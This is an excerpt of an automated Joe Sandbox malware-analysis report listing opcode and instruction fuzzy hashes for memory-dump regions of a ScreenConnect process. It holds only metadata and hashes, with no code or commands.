                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b268de392b6862d669738c6e216296729b0d6e6d4303db22d70237b902b63c4c
                                                                                                                                                                                                                                                                    • Instruction ID: d68d5f54b8246d9dca5e6ef474bf9fd33e0b7bd27e2f71a0e55da273503499d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b268de392b6862d669738c6e216296729b0d6e6d4303db22d70237b902b63c4c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A11B675B002155BD724EB68D890BAEB7E6FBC5610F408628E509AF380DF70AD0687E1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b70d7795e898c346c62b4fed65b1376408e4806050e1167377f23c6711c7ffe2
                                                                                                                                                                                                                                                                    • Instruction ID: 6f55962ad9c99e8d1cc8eab3028ac858da9e5d8af0cc28b063690a4f80eb659b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b70d7795e898c346c62b4fed65b1376408e4806050e1167377f23c6711c7ffe2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4111F35D0021A9FCF50DFA4D980ADEBBF5FF49304F10856AE505BB260E771AA06CBA1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: de73744088fb24b211d82129ac4ca4125a7de0e66f149601e2e0379cc4690ca4
                                                                                                                                                                                                                                                                    • Instruction ID: 6fb92e84dbff3d1ea01ff88410a0b8016c84ed596e90b6c39100ddbc002489a8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de73744088fb24b211d82129ac4ca4125a7de0e66f149601e2e0379cc4690ca4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60115831940249DFDB10DFA8D8849ECBBF2FF84314B98C554E085AB116DB35A947CBA1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 5211d91126d837eb0d2f5d06fcf509bf06f0bce0072d16f09c04aae03dba1bbc
                                                                                                                                                                                                                                                                    • Instruction ID: 729ace0d1b423952b7517dbab7102f6f14fc408f6566cf4169a2f9c3300c072b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5211d91126d837eb0d2f5d06fcf509bf06f0bce0072d16f09c04aae03dba1bbc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D012475950204EFD705EFF098812A87BF8FB01314F40826BD198DE112CB719D42CBA2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 19e60ed529f7042689d45c835d877d8c26dc6996da343b172cf5331848c35dbf
                                                                                                                                                                                                                                                                    • Instruction ID: ac8dca69bd0ebcc9fcbd26c75c61c1f6cb44e30f254b8ec0d76ff0d96efdd339
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19e60ed529f7042689d45c835d877d8c26dc6996da343b172cf5331848c35dbf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0501B135B003219BDB149BA9D84519BBBF9FBC87207148A2EE445CB341DBB69C028BD0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 4853344c55830925bc66cfe76044a06c2d7320a1954b15415b2529ddce7f1abb
                                                                                                                                                                                                                                                                    • Instruction ID: f11a5bed21bcc8150f79bf2ad89892d9e5ebea15c72d2ed32bd474716ea1bed3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4853344c55830925bc66cfe76044a06c2d7320a1954b15415b2529ddce7f1abb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71111275D0021A9FCF10DFA4D9809DEBBF5FF49714B108569E509BB260D771AE0ACBA0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566169410.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_104d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 352cd6480b62208405f9bd97941c7393d8342396528f4d64e71629cb8c9365bf
                                                                                                                                                                                                                                                                    • Instruction ID: 67e60aa2d98f01bd7b7c04ab31acecd2e1ee687eb7f8e7361a6c8fb649ad641b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 352cd6480b62208405f9bd97941c7393d8342396528f4d64e71629cb8c9365bf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD018CB140D3C09FD7124B258C94752BFA8EF53224F0981DBE9888F2A3C2695C45CB72
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566169410.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_104d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 64bf2bb5e4503e78a8c082f867445c3c39d5cb079d3f97e7540b016590c9317a
                                                                                                                                                                                                                                                                    • Instruction ID: 4c5c4e278d9a1f26cb83906067263c96fd774f8228d75ae9392765dc688cfcce
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64bf2bb5e4503e78a8c082f867445c3c39d5cb079d3f97e7540b016590c9317a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF01A7B1404340ABE7605A65C8C4767BBD8EF512A4F18856AFD890F282C2799441CBB5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 546a5ad39c9bdffe46e1d695cd3f08cadd088232a9c3f4c03a14328842d9d849
                                                                                                                                                                                                                                                                    • Instruction ID: ff3905ae2a0826f6938a78b02ab4f97dd8becb3bc786cafdf0eca3457706ce4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 546a5ad39c9bdffe46e1d695cd3f08cadd088232a9c3f4c03a14328842d9d849
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F0AF32A08304AFD754CF7AE84069BBBE9EB84211F15C47FE98CC3200E635A841CB61
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 756680703d0a4fb73c87794b5aa7dd3f8f6e614b1068b1505ac3b8f445b04a29
                                                                                                                                                                                                                                                                    • Instruction ID: 66464cd2cfa10b463692942359bfd9365a6c5ec7a09f3db0c585149205be0e8b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 756680703d0a4fb73c87794b5aa7dd3f8f6e614b1068b1505ac3b8f445b04a29
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5016D7261C3108FD764DF28A40169ABBE9AB94311F04C87EE4C9CB280EA71AC41CB55
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b0f8324f353d766c18b114db1b5bee75208dda26a91bce587c3d27086f648b9c
                                                                                                                                                                                                                                                                    • Instruction ID: 4dc5fe4b234000202306ce3cd88040a41f3c9d9440c7d9762af305f5d92f98e3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0f8324f353d766c18b114db1b5bee75208dda26a91bce587c3d27086f648b9c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F05E37B083045AD718CAAEA40069BBBDDCBC4221B24C07FD54DC3640E932A5008764
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 750b17a61773f7ccaca51f9afab2d099c1990433e6fa4baa52deb0fec8eb76f1
                                                                                                                                                                                                                                                                    • Instruction ID: 3dca582c3f158c97af6fd3887fd9264e67c43e68f9d6fcc0c5c3cab94755d67f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 750b17a61773f7ccaca51f9afab2d099c1990433e6fa4baa52deb0fec8eb76f1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F06275D00208DFCB50DFA8DA4119EBBF5FB44211B54C56EE459EAA04EB3295028B92
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 507bf223fe1551b246689ddf7ccf8b05393cbca3bf5c4ae664e6d407ec43340b
                                                                                                                                                                                                                                                                    • Instruction ID: ecf12439d89e85a500435a9b56667ae982e405defeb784b021116d34e649c5bb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 507bf223fe1551b246689ddf7ccf8b05393cbca3bf5c4ae664e6d407ec43340b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F0B43A3002145BCB52A67DD81064F37E6EFC9610B44826DE985DB604DB35F8165B91
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 445d6f831cdf4395a796806226c277f6705855c719994a5d9961aef0650055ce
                                                                                                                                                                                                                                                                    • Instruction ID: 7ed1ebbd8703b6584668c11d46fec3f38f67ba0de25b63462b69708dfefa4e26
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 445d6f831cdf4395a796806226c277f6705855c719994a5d9961aef0650055ce
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0F09EB38083518FE321C779F8103E93BE2FF91120B44469EE0C18F565E765B506C361
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e8e0012754f377d1156a2f4708b66162c3cd6a4d8a041ee90fbce9f1c671fdec
                                                                                                                                                                                                                                                                    • Instruction ID: c0a4bae486f4f997a00ab2c5c288b03048188c4e148692e1a1ae7b656e6fcd92
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8e0012754f377d1156a2f4708b66162c3cd6a4d8a041ee90fbce9f1c671fdec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8E09232B005129FC711869CAC46A557BDDB7482A5BA886B5F469CF391FB30DC418281
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a6d91b996df260a72775b4c4bb6457f39ce6bb45438ed4fbbf2a4b0e6324bb81
                                                                                                                                                                                                                                                                    • Instruction ID: ecc666f3813392658ba29d6a656677ef50c8e2a3d04ddbb21fc227e957fb2431
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6d91b996df260a72775b4c4bb6457f39ce6bb45438ed4fbbf2a4b0e6324bb81
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BF065393006246BCB62B69EE41059F37EAEBC9560744C12DE985DB705DF74E8124BD1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a8c5033a390279468bfc1313e965d0af3a63b048e529b80f641208a2918902dd
                                                                                                                                                                                                                                                                    • Instruction ID: d0b3f8950dbab0a681be7a9c918e8695e4a24b2f1b6f8abf822e1ef21081b011
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8c5033a390279468bfc1313e965d0af3a63b048e529b80f641208a2918902dd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDE0D831300314A757251A9AA49D12FBEDEEBC9621754413DF649CB340CE719C058394
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0426c11afbda087341dbf2f4801d01f8395665d40b978e639fe01a9e406e9baa
                                                                                                                                                                                                                                                                    • Instruction ID: 1a88ce195df78aca42f2323d6685a1babf585faab11053fbf1534d149c21daca
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0426c11afbda087341dbf2f4801d01f8395665d40b978e639fe01a9e406e9baa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6E0A9392003149BE724AB69A44812A7BEAEBC8222B00423AE486C7284DF759C01CBA0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 43bec4dfb92d61183b07551e339eb4b4bb05479b87e2737173980653c308f930
                                                                                                                                                                                                                                                                    • Instruction ID: 673f1f819b0ec63f6d0c83ade7df35eefad652bcbfef257fb0a89577afdf2475
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43bec4dfb92d61183b07551e339eb4b4bb05479b87e2737173980653c308f930
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CE0DF31300314A797251A9AA49C12FBADEEBC8621744803DF60ACB340CE729C0683A0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a50d55377a03fb4af176df2e81b565d05ccdb62856b4a4f3e0394ac8de326931
                                                                                                                                                                                                                                                                    • Instruction ID: 60bfebad816edee19cad853cd8834dcc9eab4a1867205b43e9c73891bfce15e5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50d55377a03fb4af176df2e81b565d05ccdb62856b4a4f3e0394ac8de326931
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DE08C33B014529B8B5081DC9C45695B7CEAB892A4BBD86B1FAA9CF381FA31DC024381
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e508743d87804212930f6ad6a76423103a86a869bb73cb1029ad22253d2ff841
                                                                                                                                                                                                                                                                    • Instruction ID: 1e02a880b260fd7bee70af1866927496a14cad5b2c2d8f4efa8b0476d628f449
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e508743d87804212930f6ad6a76423103a86a869bb73cb1029ad22253d2ff841
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36E08639300318575318667DE55C45F7FEEEBC92613144125F556C73C4CE759C01C7A0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 049dcb14592576d0ca4dc8c865a8c88d248c0813d02bd15a0a3c8faf37f9cef3
                                                                                                                                                                                                                                                                    • Instruction ID: a1ab13ba6eccdf76d4f934bd037cfa1af602fbbb33b449fd946225050ccfa4b0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 049dcb14592576d0ca4dc8c865a8c88d248c0813d02bd15a0a3c8faf37f9cef3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FE04FB8901218EFD714EFB4E9956AD77F8E705205F105279E809DB250EB705E01CB91
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0d587ce6f3eaad27d11a935ac09a10bf1ef5154aadd37a25ecaf1f53e7019d59
                                                                                                                                                                                                                                                                    • Instruction ID: 83d3aa6e9aa6f27a0bd4ff2ef7c76c03c63835599d22b94c441c66d1ab363605
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d587ce6f3eaad27d11a935ac09a10bf1ef5154aadd37a25ecaf1f53e7019d59
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E04F30901208FFDB50DFB5E94169E77F9EB45210F1046AAD844D7200DE362E41AB45
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3fc4052f42b92377679cc8dad30167337679a5c679b9751a6b50980aca547e80
                                                                                                                                                                                                                                                                    • Instruction ID: da1307bc51cc51e8384ac946ac88c0224cb6d1011b6445697159df12adca6e62
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc4052f42b92377679cc8dad30167337679a5c679b9751a6b50980aca547e80
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FE04F31416714AFC340AF24DD07785B7F4EB55300F54886DE88CCB380D235A805CF92
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: ef0c48f29560d0607aca4ae7f4d6185d1107e1bbe23c00240253c876df1f3686
                                                                                                                                                                                                                                                                    • Instruction ID: f3a165df6225b508111cdd10842de232810a34da78c5d55f9d84ce1eb3944e2f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef0c48f29560d0607aca4ae7f4d6185d1107e1bbe23c00240253c876df1f3686
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04E0EC768542159FC740AFB4E94578ABBE4EB64200F548D2EEC88D3344E2B5A9458B91
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 7151569889c3027ea10fe542ceb796d953d0b6d364fa433ad607906cdd493c10
                                                                                                                                                                                                                                                                    • Instruction ID: 58e89847f8e26e6a0d3830fbaab12a10b92585e35fe00553f819d323c921bf99
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7151569889c3027ea10fe542ceb796d953d0b6d364fa433ad607906cdd493c10
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9E0C276A047125BD739EB69F8407DD63E2BFC4220F045B6CE0858F649DB61B90683A5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
